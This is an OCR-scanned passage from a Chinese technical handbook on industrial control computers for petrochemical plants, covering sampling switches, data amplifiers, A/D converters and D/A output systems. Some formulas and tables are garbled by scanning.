湿簧采样方案的显著特点是可靠性高。如某化肥厂,ARCH- 1000机及某地石化一厂 M-5F 机均采用湿簧采样方案,数年来采 样器从未发生故障,但不足之处是速度慢。在一些对速度要求不 高的场合,从可靠性角度出发,还是值得推荐使用的。 (三)其他采样开关 主要指无触点开关,近年来国内已有研制、试用。现介绍如下。 1. 晶体管变压器耦合 (1) 一路 一个变压器每一路变压器初级与次 级有一层铜箱屏蔽,这层屏蔽接到每一路的现场地。变压器外面 有两层屏蔽,内层是坡莫合金,外层是铜,外层屏蔽是接在逻辑 电路的地上,有了两层屏蔽则可有效地抑制外来的电磁干扰。这种电路速度较快,每路间互相干扰较小。但造价较高,对 变压器性能的一致性要求较高。 (2)多路共用一个变压器变压器外面也用两层 屏蔽来抗外来电磁干扰。这种电路元件省,但当某一路晶体管常 通后,其他各路均要受到影响。所以应采用二次采样分组进行。 对有的要求特别严格的采样器,变压器还有用三层或多层屏蔽的、 2. 用干簧-变压器-晶体管 一次采样用干簧,二次采样用晶体管。其他与上述方案相同, 此方案适用于中等速度。由于有干簧所以寿命有限,但消除电路间干扰效果较好。 3. 用场效应管作开关 这种电路速度快,体积小。但由于管子截止时有漏电流,因 此会引起电路间干扰,路数越多干扰越大。当一路管子常通后, 与干簧吸死是同样后果。所以如采用此方案,则建议采用二次采 样 为 好 。 六、干簧的挑选及测试 选用一致性好的干簧对提高测量精度是重要的。在测试挑选 过程中,吸合、释放、抖动时间、接触电阻以及开路电阻则是最 重要的选择指标。速度较高的采样器,对于干簧的吸合、释放和抖动时间,要求更为严格。 规 格 最高 频率 Hz 绕阻参数 电流参数 mA 时 间 参 数 m s 电阻 Ω 匝数 额定 吸合 释放 吸合 释放 抖动 JAG-2-4H 200 255 4000 24 5-15 ≤4 ≤2 ≤0.8 ≤0.35 JAG-2-2H 250 270 4000 20 4-12 ≤3 ≤1.6 ≤0.6 ≤0.3 JAG-2-1H 300 320 4000 ≤10 >2.5 5 ≤1 ≤0.5 ≤0.3 七、多路开关的漏电阻和分布电容对信号正确性的影响 有n 个信号输入的多路开关。即是不分组的一次 采样方案。其中:E₁~E, 为信号源,Ecm为共模干扰电压,R₁ 为多 路开关各自开路时的等效电阻, a 、a '为多路开关公共的对地参 考点。 n 个信号源的两根总的信号输入线各有(n-1) 个Rπ电阻 构成并联关系。Rr 虽然是足够大的,但当 (n-1) 个Rr 并联时,其 并联阻值(设为Ret) 则大为下降,这就大大降低了两根信号总线上a 及a 对地的有效漏电阻,这个阻值可用同时多路开关n 的数目越大,即采样点越多,也意味着分布电容 越严重。而Rr 的下降及分布电容的增大,将影响系统共模抑制 比的提高,并且使信号的传输效率下降,直接影响信号测量精度。 为此,建议采用分组的二次采样将能克服上述弊病。 按图5-11所示的方案,公共基点 a及 a'对地的漏电阻及分布电容将显著减小。这样就提高了系统的抗干扰能力及信号测量的精度。 八、采样点切换周期T 的选择 在条件许可时若采样点切换周期T 选择足够长,对提高CMR 是有利的。 九、不同电平输入信号的切换 如果输入信号电平不同(譬如0~10mV 和0~1V) 就会在由 高电平切换到低电平时产生误差。误差电压信号与两相邻通道输 入信号电平差成正比。 十、采样越限报誉 这是巡测的一个不可忽视的方面。尤其是一些要求高的化工 生产过程,系统各点的被测参数都是有一定的许可范围的, 一旦 超越限值,正常生产将受严重影响。因此, 一般控制机都设有限值 判断及报警逻辑线路,机器一旦发现被测信号超越限值(上限或 下限),就会立即发出报警信号,使操作人员能及时进行处理,确 保控制正常,避免事故发生。报警信号有声报警及光报警两种, 同时还要求报警信号能自保持。以便使“警报”未得到处理之前 仍继续报警,待报誉处理完毕,可由人工清除。 十一、使用采样器需要注意的若于问题 在选用采样器时,除了要满足基本的技术指标外,在采样器 的结构上还需具备以下措施。 (一)抗干扰措施 1. 屏蔽 为了防止电磁场相互干扰,要求有良好的屏蔽措,须把干簧继电器装在屏蔽盒里。 2. 电容滤波 为了抑制串模干扰,采样器的输入端应装有 滤波环节。 (二)绝缘处理 1. 以防止机器脉冲信号漏入被测小信号,以免引起误差。 2。对干簧触点处的玻璃管应进行绝缘处理,防止通过玻璃 管漏电。 3、 接线板也应进行绝缘处理。 (三)浮空处理 采样盒外壳应是浮空的,不能与机壳短路,以利于消除共模 干扰。 (四)布线的合理性 由于采样器的引出线较多,因此要求有合理的布线(避免接 长线,线可粗些)以尽量减小分布、电容所造成的影响。 第六章 数据放大器 第一节 概 述 数据放大器的作用是将被测信号予以放大。数据放大器性能 的好坏,是影响测量正确与否的一个关键因素,所以放大器的质 量问题均为使用者所关注。在选用放大器时,通常对增益稳定度、 线性度、抗干扰能力、漂移、输入和输出阻抗等指标,要求尤为 严格。 目前国内定型生产的放大器形式不一,应用的范围及效果也 各异。其中以苏州仪表元件厂生产SF-72 型放大器获得较好的评 价。此外还有表6-1所列的几种放大器使用效果也较好。 第二节 SF-72 放大器简介 目前国内有不少单位都采用SF-72 型放大器,其效果良好。 现举其技术指标如下,可作为石化系统选用控制机放大器时参考。 一、SF-72 型数据放大器技术指标 (1)电压增益 0、 3、10、30、100、300、1000分档切换, 并用多圈电位器在各档增益数之间连续可调; (2)直流增益精度 ±0.1%; (3)增益稳定度 ±0.1%; (4)直流增益线性度 ±0.1%; (5)输入电阻 大于100M0; (6)输出电压 直流或交流峰值±10V; (7)输出电流 直流或交流峰值±100mA; (8)输出电阻 高端输出小于10,低端输出小于0.10; (9)电容负载 小于2μF 时放大器稳定工作; (10)短路保护 输出端短路不致损坏放大器; (11)频带 直流到1KC 平坦,大于或等于10KC 时下降 3db; (12)建立时间 在正负极性时均≤300Hs; (13)过载恢复时间 在各档增益下,输入±20V 方波过载 信号时,恢复时间小于1ms; (14)温度漂移 在25℃±10℃范围内小于±0.5HV/℃(折 算到输入端)及满度的±0.05%/℃; (15)时间漂移 8小时内小于±3HV (折算到输入端)及 满度的±0.005%;200小时内小于±4HV (折算到输入端)及满 度的±0.02%; (16)噪音 输入电阻为0~1KQ 时折算到输入端有效值小 于3μV及输出端250μV有效值; (17)共模抑制比 输入端不平衡电阻为0~1K2 时,50Hz 交流大于120db, 直流大于160db; (18)抗共模电压 ±300V直流或交流峰值; (19)电源 220V±10%,50C/s±2%,14VA; (20)环境条件 检定温度:25℃±10℃; 湿度:30~80%;无损适用温度:0~50℃; 湿度:30~80%。 二、SF-72 型数据放大器原理简介 本放大器主要由电位放大器(包括斩波放大器A₁、直耦放大 器A₂ 、电阻性反馈网络R、R+z 及非线性反馈网络OL) 、 隔离器 T 及传递放大器A₃组成,见图6-1。 输入信号从AB 间引入,经电位放大器放大后,其输出电压 eo经Rn 、Rtz 分压后, E 端的电压馈入输入端,它形成一与A 端 相抵消的电压,放大器输入电阻 R;n 两端的电位差就趋近于零。 如果A₁和A₂的总增益足够高, A 和E 间的电位就十分接近,而没 有电流流过Ri, 所以放大器的输入阻抗可趋向无穷大。其实防 值计算如下: 非线性反馈网络OL 的作用在于当输入过载时使放大器保持 恒定的闭环增益,以抑制振荡,加速过载恢复过程。 隔离器T 包括两个晶体管无触点开关S₁ 、S₂ 和一个隔离变压 器T, 测量放大器的输出信号送到隔离器的输入端,晶体管开关 S₁和T₁的初级绕组组成全波调制器,T₁ 的次级和晶体管开关S₂ 按 相反的步骤进行同步解调。由于采用了较高的开关频率,因此它可以通过直流信号和一定频带的交流信号。隔离变压器T;的初级 和次级之间只有磁耦合,当将其次级屏蔽层接至保护屏蔽罩后即 可实现测量放大器部分的完整的静电屏蔽,提高了抗共模干扰 能力。 隔离变压器T 输出的信号经RC 滤波器后送到传递放大器把 信号放大到±10V 的电平,并能提供±100mA 的电流,起了阻 抗变换的作用,它的输出阻抗极低,可视为恒压源。 第三节 放大器抗干扰能力的分析及其他 一、提高放大器抗干扰能力的途径 要提高巡测系统的共模抑制比, 一个十分重要的方面就是选 用有较高的抗共模干扰能力的放大器。 二、差动双端输入放大器抗共模能力分析 由第四章第二节共模干扰的引入分析中已知,要使Z=Z₂, Zcm₁=Zumz, 实际上是不可能的,因此这种放大器抗共模干扰能 力要做到较高是困难的。即使做得很高,但由于晶体管的Vμ 结击穿电压只有几伏,因此限制了超过10伏以上的共模电压的使用。 差分放大器为提高共模输入阻抗 Zcm, 采用共模负反馈的形 式,则是比较理想的方法。其中,差动输入回路 用T₃ 作为恒流管, R₅ 、R₆ 、T₃ 构成共模负反馈回路,当T₁ 、T₂输入的共模电压提高时,即 Ecm 增大,就随之引起 Ic₁ 、Ic₂ 的增 大 ,Ic, 、Ic₅ 下降,T. 、T₅ 射极分压电压 uxo 下 降 ,[ng、Ies₃ 减小, 最后使Ic₁ 和Ic₂减小,这样由Ecm增大而引起的 Ict 、Ic₂ 的变化得到了抵偿,从而提高了对Ecm的抑制能力。 三、动态桥式平衡放大器抗共模能力分析 此放大器,如图6-3所示,它是由对地C浮动的放大器F; 、 F₂, 桥路放大器F₃ 、F₄ 构成的双通道四端放大器。当浮置放大器 输入为零时,即E₂=E,E₁=E₃ 。 此时四个放大器组成动态桥 路,放大器达到平衡,于是产生总的输出电压E₆。因为 E₂=E₄ (下通道稳定条件) 若整个放大器输出电压E₆ 在上述假定条件 满足时将正比于两个输入信号E₁ 和 E₂ 的代数差,而达到差动放 大的作用。因此当共模电压在放大器输入端引起的共模干扰 Eeml=Ecm₂时放大器的输出E。不受共模干扰电压的影响,放大器 就具有无穷大的共模抑制能力。而实际上R₄ 与R₆,R₅ 与 R₇ 不可 能完全相等,这样共模电压Vm 在上下二通道中引起的干扰输出 就不可能在动态桥上完全抵消,即由式(6-4)可知:所以在实际应用中,动态桥路共模抑制比的大小将与R₄ 、R₆、 R₅ 、R₇ 有关。 另外,由于受到晶体管耐压不高,易受击穿的限制,所以这 种电路只适用于抗十几伏以下的共模电压,这是此电路的最大 缺点。 四、浮空隔离式放大器的抗共模干扰能力分析 浮空隔离式放大器之所以具有较高的抗共模干扰能力,其实 质在于提高了共模输入阻抗,减小了共模电压在输入回路中引起 的共模电流,从而抑制了共模干扰的来源。浮空隔离分双层隔离 (双层屏蔽)和单层隔离(单层屏蔽)两种,现对其隔离效果分 析如下。 Zsi 、Zs₂ 为信号源内阻,Zs₃ 为信号线的屏蔽线 电阻, Zcm₁、Zem₂ 为放大器的输入电路部分对外保护屏蔽罩的漏 阻抗,Zcm₃为外保护屏蔽罩与放大器输出地之间的漏阻抗。图6- 4的连线使信号源和放大器输入部分被一个完整的静电屏蔽网的 屏蔽。合理的电路设计及结构的正确安排,可使Zcm1、Zcm₂ 、 Zem₃达到数十兆欧以上,这样信号地和放大器输出地间的共模电 压Em就不会直接引入放大器,而是先经Zs₃和Zcmg 产生共模电流 I₃, 由于Zs₃较小,故I₃ 在Zs₃上的压降uzs₃也很小,可把它看成一 个已受到抑制的新的共模干扰源Ecm'。 Eem'通过Zs₁、Zcm!和 Zs₂、Zcm₂分别形成回路,产生共模电 流I₁ 、I, 并在Zs₁和Zs₂上产生干扰电压uzst 和uzs 。这时放大器 输入端间所受到的共模电压的影响即为uzs₁与uzs₂之差值: u"m=Uzsi-U7s 因此Z cmg>Zes,Zcm₂>Zsz, Zcmt》Zst,所以引入放大器输 入端的共模干扰近似为: 这样对共模干扰的抑制能力就降低了 倍,这是不希望的。 五、关于提高放大器输入阻抗 提高放大器输入阻抗是提高系统测量精度和灵敏度的一个重 要方面,同时对增强抗干扰能力也有帮助。由于信号源输出阻抗 与信号线电阻对放大器的输入信号有一定的分路作用,信号源输 出阻抗过大,信号受到损失也就越大。为此,希望有尽可能大的 放大器输入阻抗和低的信号源输出阻抗。 第四节 放大器的使用 一 、使用放大器应注意的事项 1. 正确的接线 一台新的放大器与信号源的正确连线,是 保证使用好放大器并充分发挥放大器的性能之基本条件。在连线 时,尤其要注意使放大器的输入部分,包括信号源系统和信号连 线在内的完整的静电屏蔽,也叫法拉第屏蔽网。放大器与信号源 之间的正确接线方式请参看第十五章。 2. 过载保护 由于现场使用条件比较复杂,因此输入过载信号有时是难以避免的。此时会使输入耦合电容过量充电,致使 放电时间太长,影响正常的工作速度,尤其是晶体管的击穿电压 低,输入过压往往会击穿管子,使放大器受到损坏。为此,要求 放大器输入端有限幅保护措施。 1)二极管限幅 D₁ 、D₂ 、D₃ 、D₄ 组成第一级限幅,因每只二极管正 向限幅电压约0.7V, 故第一级限幅为±1.4V,D₃ 、D₆ 组成第 二级限幅,限幅电压约±0.7V,R₁ 、R₂ 为限流电阻,防止输入 的过压信号V,不至于全加在二极管上,起保护二极管作用,同时 通过R₁ 、R₂ 实现低压稳压限幅。 2)通过非线性负反馈加速过载恢复(见图6-7) 图中当输入过压时必然导致放大器输出或某个中间级输出V。 超过额定电压Vpw(即稳压管DW 的稳压电压),此时DW₁ 或 DW₂ 就由原来截止变为导通,其导通电阻小,所以放大器的输出电压 V。就反馈到放大器的输入端。输出正向过压时DW₂ 为正接,DW; 反接。反向稳压电压Vow, 就通过D, 反馈到放大器输入端, 此时输出正向限幅电压为Vow₂(正)+Vow₁(反)。同理,若输出 负向过压,则输出相应的负向限幅电压为Vow₁(正)+Vow₂(反)。 而正常工作电压时DW₁ 和 DW₂ 均处于截止状态,不产生非线性 负反馈。 3。放大器使用之前应接通电源预热数分钟,如需进行精确 测量,则应预热一小时以上。 4。放大器在现场使用必须注意防震、防潮和进行室检。 二 、免用放大器的条件 多年来不少放大器的质量问题一直为用户所关注。同时,由 于放大器线路复杂,调试及维修比较困难,其性能往往不易长期 保证,尤其零点漂移、线性度及现场抗共模干扰等性能指标,不 易满足用户要求,影响了信号测量精度,妨碍了系统控制品质的 提高,因此有的单位,如条件允许,可设想去掉放大器,信号测 量精度仍能保证。某炼油厂的直控机 (DDC) 曾成功地去掉了 放大器,信号测量精度仍能保证, DDC 长期可靠运行控制生产。 其之所以能成功去掉放大器,原因有: 1。原放大器为1:1放大器,信号传输可以不借助于放大器进 行放大。因为DDC 原设计与DDZ-Ⅱ 型变送器配套使用,后者输 出0~10mA的电流信号,经过500Ω的测量电阻,产生0~5V的 直流电压信号送给放大器,而模/数转换器已设计成0~5V的大 信号转换,所以放大器实质上只起了“隔离”的作用,若去掉放 大器,模/数转换勿需改动即能正常工作。 2. 干扰现象不严重,检测工作不受影响。因为一次发讯是变压器隔离输出,所以对于交流共模干扰能起抑制作用。同时变送器(信号源)实质是一个恒流源, 图6-8为其等效线路图,其内阻远大 于测量电阻(500Ω),所以直流干扰 信号经 R内与测量电阻(500Ω)分 压后大部分被滤除。根据实测结果, 现场干扰影响不大。 3. 因变送器均恒流输出(0~ 10mA), 此信号经500Ω测量电阻转 换后送给模/数转换器进行转换,因此也不存在因阻抗不匹配而损害测量精度问题。 长期使用效果说明,在上述情况下去掉放大器是行之有效 的,测量精度能满足±0.3%。 第七章 模/数转换器 第 一 节 概 述 一、作用 模/数转换器亦称编码器。其作用是将经放大了的模拟量信 号(温度、压力、流量、液位等)转换成相对应的数字量信息, 并由主机控制,通过输入通道送入内存。 二、分类 模/数转换器的类型有多种,按其动作原理及性能可分为: (一)比较编码型 1. 模拟伺服型 2. 数字伺服型 3. 遂次比较型 (二)计数编码型 1. 锯齿波型 (1)斜坡型 (2)阶梯锯齿波型 2. 积分型 (1)单积分型 (2)双积分型 (3)调制型 (三)混合编码型 积分电位差计型 三、各类型转换器的比较 各类转换器性能及优缺点的比较,列于表7-1。 类 型 优 点 缺 点 逐次比较型 速度和精度都较高 ①输入阻抗不易提高 ②抗干扰能力不强 计数编码 锯齿波型 ①逻辑电路较简单 ②造价较便宜 ①线性及稳定性不够好 ④速度提高困难 ⑧抗50C/s干扰性能差 积 分 型 ①精度高 ②对工频的抗干扰能力较 强,有自适应滤波特性 速度不高 四、选型原则 根据石化系统多年使用控制机的情况看来,模/数转换器在 选型时可考虑以下四个方面的要求: 1. 可靠性高; 2。满足一定的精度要求; 3. 造价较便宜: 4. 小型化。 第二节 常用模/数转换器简介 一、逐次比较型 逐次比较反馈编码型是应用比较普遍的一种转换器,其基本 原理是把输入的模拟电压与一系列数字电压比较(通过数模网络 输出一参考电压来进行比较),数字电压逐次收敛, 一直到模拟 电压与数字电压相等为止。然后显示出代表此电压的二进制数。 设输入的模拟信号为Vx, 参考信号为Va, 输出的数字信号为X, 则X=[Vx/Vk] 。 以二进制表示则为: X=a₁2-¹+a₂2-?…+an2-(0≤X≤1) 一个反馈式的模/数转换器又可以表示为: Vx≈Vn(a₁2~¹+a₂2-²+…+a₀2-*) 此式右边是反馈电压Vy, 它由数/模网络产生,然后与输入 电压比较,结果输出二进制数字。 (一)逐次比较的技术指标 以下是一台典型控制机逐次比较型模数转换器的技术指标, 可作为选型时参考。 ① 编码 二进制; ② 位数 十二位; ③ 工作温度 -10~45℃; ④ 输入信号0~40.95mV; ⑤ 转换时间 5ms/ 次; ⑥ 输入阻抗 5MΩ; ⑦ 鉴别能力 <1 mV; ⑧ 网络精度 0.05%; ⑨ 精密电源精度 0.03%; ⑩ 模数总精度 0.1%。 (二)逐次比较型的工作原理 逐次比较主要由控制器、数码寄存器、数模网络、比较器及 基准电源组成。 图7-1为其工作原理框图。图中,M: 到 Mn+i是由控制器发生的一系列顺序脉冲,模/数转换器一旦开始工作, 先由控制器发出脉冲把数码寄存器清零,然后顺序脉冲开始工作, M₁把最高位T, 触发器置“1”,并通过数/模网络输出一相应 的参考电压Vg与待转换的输入电压Vx进行比较,此时若Vg>Vx, 则比较器输出端A点电位为负值,与门“1”开放,当M;脉冲负 跳到来时,通过与门“1”使T₁ 触发器置“0”。下一节拍到来后 则把T₂ 触发器置“1”然后又通过数/模网络输出的参考电压Uα 与 待转换电压Vx比较。此时若Vg′仍大于Vx,T₂ 又被置“0”。若 V<Vx, 则比较器输出端A 点则为零电位,与门“2”关闭,T₂ 保持“1”状态。M₃ 到来又把T₃ 置“1”。这时触发器状态是T; 为 “0”,T₂ 为“1”, T₃ 为“1”。如此下去经过逐位比较,直到 M₀+t 脉冲工作结束,模/数转换才告完成。这时数码寄存器所存 放的数码就是被测信号所对应的数字量。图7-2是Vx=1036mV 时 模/数转换工作原理波形图。 二、双积分型模/数转换器 这种转换器通过将输入电压转换为时间宽度,在这时间宽度 内用一定频率的脉冲数来表示被测电压的模拟量。图7-3图7-4分 别为其原理框图及其转换波形图。其工作过程是:在t₀ 时刻计数器清零,在t₁ 时刻Vx 接入积分 器,积分器输出反相积分电压V。形成向下斜坡。 在t₂ 时刻控制电路将换接开关K, 转向E, 则对 Ea 进行积分,形成向上斜坡。此时:当向上斜坡积分一到达“0”点时,检零器动作,这一时刻 为 ts, 检零器把门关掉,计数器停止计数,并且控制开关K₂ 闭合,积分器钳位。由于 V₀=Vo' ( 当t=t₂ 时) 。所以 VxT₁=ET₂ 可见T₂ 正比于Vx, 当 Vx 增大时, T₂ 时间相应拉长,则计数 器计数增多,故计数器的脉冲数目可表示Vx的大小。 三、斜坡型模/数转换器 该转换器可将稳定的稳入被测电压与线性的锯齿波电压相比 较,锯齿波电压从零达到输入信号电平为止的时间间隔内用计数 器进行计数,所得到的数值与输入信号成正比。图7-5和图7-6分 别为其原理框图及波形图。 其工作过程如下:控制器发生启动脉冲,启动锯齿波输出线 性扫描电压,当扫过零伏时比较器1输出脉冲,触发器被置“1”, 于是振荡器发出脉冲通过计数门向计数器计数,当锯齿波上升到 Vx时,比较器又发出终止脉冲,触发器被置“0”,门被关闭, 计数也相应结束,可知从启动脉冲到终止脉冲这一段时间间隔r 内计数器计数,因为T 与V₂成正比关系,所以这时计数器所存的 数字,也正比于输入电压Vz。 第三节 模/数转换器的使用 一、模/数转换器使用过程中可能出现的若干问题 (一)灵敏度下降 其原因有: ① 管子性能变化,如数/模网络的开关管β值下降,鉴别 器中差分放大器性能不对称或β值下降; ② 阻抗不匹配,若数/模网络输出阻抗高,鉴别器输入阻 抗低,造成失配,影响灵敏度; ③ 连接线过长过细,如精密电源输出线,数/模网络到鉴 别器的信号线、地线等,若过细过长就会降低灵敏度,且易于引 入干扰; ④ 电源纹波过大,接线不合理(尤其地线),此外长期使 用后电源中大容量的滤波电容干枯,使稳压性能下降; ⑤ 接地点选择不当,使地线形成回路,导致数/模网络输 出不准,鉴别能力下降。 (二)漏码 其原因有: ① 数模网络不准,则可能引起有规则的漏码; ② 精密电源不准; ③ 数/模网络中Rπ电阻不准; ④ 开关管老化,残压增大,网络输出值变小; ⑤ 鉴别器灵敏度降低; ⑥ 放大器输出平顶不平,尤其在模/数转换的一段时间内 不平。 (三)跳码 现场干扰(串模)是引起不规则跳码的主要原因,如多点接 地或电网干扰等,易引起跳码。 (四)线性度差,或在高位甚至出现“限幅”现象;鉴别器 性能变坏,高位触发器或网络开关管损坏。 二、使用模/数转换器应注意之事项 1. 地线的正确连接。在投入使用时,地线的正确连接应给 以足够的重视,否则易引入干扰,严重影响转换精度。为此,要 求地线的连接不能形成回路,最佳接地点选择,可从网络的输出 地引出。地线及其他布线尽量粗些短些,如鉴别器到网络的连线 应粗而短,并应使用屏蔽线,屏蔽层与Rt 上的地(输出地)相连 接。地线布置如图7-7所示。三台电源的地线应集中到精密电源 的“地”上,然后再接到数/模网络的地上。鉴别器屏蔽盒一般 都固定在机架上,则不必另接地线,否则会引起地线回路。 2. 鉴别器要求使用屏蔽盒,以便更有效地抑制干扰,提高 测量精度。 3. 为经常保证模/数转换器的精度,要求机器能对模/数转 换器进行自检查。可在采样点中选用三个测点,作为发出标准的固定信号的测点(其中一点为“0”值, 一点为中值, 一点为最 大值)通过主机的采样及鉴别,从而随时确定模/数转换器的精 度及好坏。以便及时发现问题。 4. 如能使模/数采样周期与50周同步,可有效消除因放大器 对50周的干扰抑制不良所造成的模/数跳码。原理示意如图7-8 所示。其中由于未与50周同步,因此50周干扰对模数转换的影响每 次都不一样,因此数码跳动较大。反之,若使采样周期与50周同 步,则干扰的影响每次都一样,数码跳动较小。 5。改善放大器输出波形,可以减少漏码现象。 八章 工业控制机输出系统 第一节 概 述 工业控制机的输出系统(过程输出通道)是把计算机处理好 的数字量转换成适当形式的输出信号,以实现对生产过程的控 制。目前输出系统大致有如下内容: 1. 模拟量输出; 2. 开关量输出; 3. 显示; 4. 报警; 5. 制表。 模拟量输出按转换方式一般可分为两大类即并行数字/模拟 转换器和串行数字/模拟转换器两种。现简单叙述如下。 一、并行数字/模拟转换器 并行转换器的转换速度比较快,因为各位代码都同时送到转 换器相应位的输入端,转换时间只取决于转换器中的电压或电流 建立时间和求和时间, 一般只是微秒数量级。目前常用的有两种 电路,即①权电阻解码网络,②T 型解码网络。 二、串型数字/模拟转换器 这种转换器是将数字量转换成脉冲序列的数目, 一个脉冲相 应于数字量的一个单位,使每个脉冲变为单位模拟量,将这些所 有单位模拟量相加,这样就得到和数字量成比例的总的模拟量输 出。这可以有很多种方法。目前使用很广泛的一种方法是采用步 进电机带动多圈电位器,调节电压或电流,实行对执行机构的控 制,但也有个别单位为了克服多圈电位器由于使用时间长,存在 接触不良的缺点,而采用了步进电机带动位移差动变压器来提高 103 机器可靠性。 近年来在以上转换方式的基础上又发展了新的输出系统,如 高速无触点数/模转换器等。 目前计算机输送到调节阀的信号可以有三种形式,如下表8- 1所示。 橹粤 波 形 特 点 脉冲宽度式 脉冲宽度和极性变化 控制机的输出信号是不同宽度和极性 的脉冲,作为执行机构的同步马达依此 来决定正反转向和每次旋转角的大小 脉冲序列式 脉冲个数和极性变化 控制机输出一串脉冲,执行机构按照 脉冲的个数和极性来决定旋转角度和方 向。执行机构必须是能接受脉冲信号的 步进马达 电平输出式 电平高低变化 控制机本身由数/模转换器把脉冲转 换为电流或电压信号,执行机构的行程 和输出电平成比例 输出方式 各种输出系统特点比较 多圈电位器 步进电机带 1.转换速度为毫秒量级 2.精度可达2 % 3.线性好 4.机器掉电时,输出能保持 5.能精密定位 6.电位器易磨损,造成接触不良,影响可靠性 输出方式 各种输出系统特点比较 移差动变压器 步进电机带位 1.速度较慢 2.不灵敏区较小,最小步进角1.5°的变化能反应出来 3.线性稍差 4.可靠性高,不存在接触问题,耐腐蚀,机械强度高 5.需要备用一套电源 6、体积稍大,重量比多圈电位器重 数气转换网络 1.转换速度为毫秒量级 2 . 精度可达2% 3.线性稍差 4.机器掉电时,输出能保持 5.有机械故障 模转换器 无触点数 1.转换速度10ms 2.精度高,可达0.1~0.2% 3.动态特性好 4.一旦掉电,输出不能保持 5.无触点,寿命长,可靠性高 模 网 络 权电阻數 1.转换速度快,为微秒量级 2、精度达1% 3.线性好 4.一旦掉电,输出不能保持 5.不存在机械故障 1.速度较慢小于1秒 D D Z - I 型 2 . 精 度 1 % 调节器等 3.线性好 4.机器发生故障,能自动切换到仪表操作或调节 5。无机械故障,寿命长,可常性高 6.安全火花型,具有防爆 7.具有测量值及阀位模拟指示 第二节 步进电机带多圈电位器输出方案 这种输出方式将数字量转换成脉冲序列的数目,每个脉冲的 作用将使步进电机转动一固定的角度,称为它的步距,例如北京 微电机厂生产的SB-3G, 其步距为1.5°。当输入脉冲一个接一个输入时,步进电机就一步一步地转动,总的角位移是和总的脉冲 数目相对应的,所以它是一种单位模拟量增量相加式的数字角度 转换器还可以用丝杠把角位移转变成直线位移。 下面我们以某炼油厂步进电机输出方案为例,简单叙述其工 作原理,步进电机输出原理框图如图8-1所示。 步进输出寄存器是用以接收计算机输出的阀位增量数码。当 执行输出指令时,阀位增量由内存取出以二进制数码形式并行送 入步进输出寄存器,然后启动输出,即将触发器T 置1,打开与 门yi, 使1KC/S 振荡源信号一方面送入环形码计数器,经输出扫 描器以控制步进电机转角。与门y₂ 、y₃ 用来控制环形码计数器的 正向计数或反向计数。使步进电机正转或反转,它将由步进输出 寄存器符号位来控制。步进电机每旋转一步,寄存器内的数就减 少1。当寄存器内数被减完时,步进电机就转到了相应的位置。 这时与门y₄开启,使触发器T 置0,输出过程就完成了。 第三节 步进电机带动位移差动变压器输出方案 某右油化工厂采用步进电机带动位移差动变压器输出系统。把步进电机的转角变化通过螺杆传动变为直线位移,从而改 变原、副边两个磁环之间的相对位置,使耦合系数改变,于是副 边感应电压亦作相应变化,然后通过电路将这个感应电压转变为 0~10mA 的直流控制电流。实现角度θ和电流 mA 之间近似线性 的变换。 第四节 无触点数/模转换器 目前无触点数/模转换器的主要工作过程就是将中央处理机 输出的数字信息,调制成与数码成正比例的脉冲宽度,然后再由隔离恒流源电路将这个脉冲宽度变成4~20mA 的 电 流 输 出 给 负 载R。 为了保证安全,在输出端还加了输出限制器。模拟量输出由 设备译码器及控制信号,地吐寄存译码器;数码宽度电路、隔离 恒流源、输出限制器,错误检查电路等组成。 如果数码寄存器的数码为101,那么当计数器从000计到101 时,计数器的状态与数码寄存器的状态相重合。HF₁ 、HF₂ 、HF₃ 的输出都同时为高电平,因此YF₉ 输出一低电平信号,通过HF₁ i、FX₁₀ 将cfn 置“0”复位。由此可以看出cfn 从被置“1”开始到 复位时为止,它的“0”端输出一个负脉冲宽度,宽度T=N · 8ns。 从数码寄存器看出,这个宽度是与数码N 成正比的,见图8-4。 第五节 权电阻数/模转换网络 权电阻数/模转换网络就是将表示某一数字量的二进制代码 每位按它的“权”的权值转换成相应的电压,然后再将代表各位 数值的电压相加,结果所得的总的电压就是与数字量成正比的模量。 一个典型的数/模转换器由四个主要部分组成:①逻辑电路, ②电阻网络,③标准电压,④电子开关。电阻网络是这种转换器 的中心部分。目前所用的电阻网络有各种不同的类型。 下面以某化肥厂ARCH-1000 型计算机数/模转换器为例来 说明权电阻数/模转换器的工作过程。 ARCH-1000 型电子计算机数/模转换器的电阻网络如图8-5。 假定r₀ 为二进制最高位(这里是第九位)的电阻, K₀ 是相应 的继电器……, ra 为二进制数的第一位的电阻, Kg 为相应的继 电器。 当各位数码分别为“1”时,将相应的继电器吸动,使相应 电阻与标准电源E₁相接,反之使其与E₀ 相接。 第六节 数/气转换网络 目前有的单位输出控制方案,采用了步进电机带动数/气转 换网络直接变为0.2~1kg/cm² 的压力去控制调节阀。例如某炼 油厂的这种输出方案的原理框图如图8-7所示。 它是在调节脉冲作用下,步进电机按每步1.5°转动(正或反 方向)则丝杆随之转动,丝杆带动滑块上升或下降,滑块带动挡 板向上或向下移动,则改变了挡板与喷嘴的距离。通过气动放大 器的作用,其输出的气压就相应的降低或升高,步进电机转动步 数就直接变为0.2~1kg/cm² 的气压输出。为了改善输入-输出特 性的线性度,加了反馈风箱。 他们利用自己仪表厂生产的位移平衡式定值器(略加改造), 体积小、精度可达2%。在位移平衡式定值器的传送杠杆上应加 上下限限位销钉。经几年运行证明输出是可靠的。 第七节 提高输出系统可靠性的措施 一、步进电机供电改进 由于步进电机带动多圈电位器,控制输出0~10mA 电 流 信 号,直接到电/气转换器控制调节阀的阀位。自动时与计算机相 连,手动时可以遥控。 一台计算机控制几十台步进电机, 一旦机 器出了问题,遥控便起了作用。因此步进电机输出信号的供电部 分是一个十分重要的环节。为了保证机器系统掉电时,模拟输出 部分的输出信号仍能保持,以维持生产现场的阀位,目前大部分 使用单位对电源采取保护措施。例如某化肥厂对步进电机输出信 号均采用双路并联供电(如图8-8),万一坏了一路电源,另一路 便自动切换投运,以确保输出正常。双路供电设有指示灯,以监 视供电是否正常。 某有机化工厂采用30V 干电池作为事故备用电源。当机器系 统的30V电源断电时,通过继电器线路能够自动地切换到电池供 电,以确保安全生产,并且,自动点灯,鸣喇叭报警,以及时通 知维护人员维修。接线图如图8-9。 系统正常供电时,波段开关置Kzi 、Kzz 。继电器线圈靠30V 机器电源供电,常开点ab,de 接通,步进电机靠30V 机器电源 供电。 当机器电源故障掉电时,继电器线圈断电,常闭点bc 、ef 接 通,步进电机电源自动切换到30V 干电池供电,并接通灯和喇叭 回路报警,以示电源故障。 有的厂加装24V 蓄电池和自动切换装置做为断电时应急处 理。并采取了“浮充”措施,即平时稳压电源对蓄电池处于充电 